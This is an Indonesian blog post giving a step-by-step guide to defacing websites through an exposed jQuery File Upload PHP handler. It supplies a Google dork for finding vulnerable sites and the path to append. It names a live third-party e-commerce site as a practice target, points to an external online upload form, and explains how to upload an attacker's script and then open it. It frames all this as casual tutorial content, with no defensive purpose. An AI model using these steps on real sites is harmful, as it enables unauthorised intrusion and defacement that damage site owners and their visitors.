Skip to main content

Posts

Featured

Cara Deface Poc Jquery FileUpload

ASSALAMU'ALAIKUM WR.WB
Hallo broo Kali ini saya akan kasih materi tentang Deface Poc Jquery FileUpload
Bahan bahan :
Kopi Udud DORK CSRF ONLINE
Next kita dorking di gugel
Dork : inurl:/server/php intext:files
Kembangin lagi mang,  kalo dapet web kasih exploit di belakang url 
exploit: /server/php/ contoh: http://site.co.li/admin/server/php/
Nah kalo blank bisa vuln bisa enggak, kalo mau yg jelas vuln tampilannya kek gambar di bawah
Gw kasih live Target aja biar kaga bingung:v
http://omjewells.com/ecom/assets/global/plugins/jquery-file-upload/server/php/
Ok kalo udh lu buka CSRF ONLINE   http://f0x55.eu5.org/csrf.php
Kalo udh lu klik aja Boss:v Terus? Biasa lah tuh live target/Lu udh Nemu yang Vlun tinggal masukin aja 
Kalo udh isi tuh bawahnya files[]
Ok langsung aja gass:v
Nah kalo udh lu masukin tuh  Script kesayangan elu:v
Nah kalo udh tinggal panggil aksesnya aja 
Contoh 
http://omjewells.com/ecom/assets/global/plugins/jquery-file-upload/server/php/files/index.html
Oke sekian…

Latest Posts

CARA DEFACE POC OPEN SID RFM

Cara Deface Cbt 2.8.0 AFU

Cara Deface Poc RFM

Cara deface poc CBT

Cara deface poc drupall hidden

deface poc File Attachment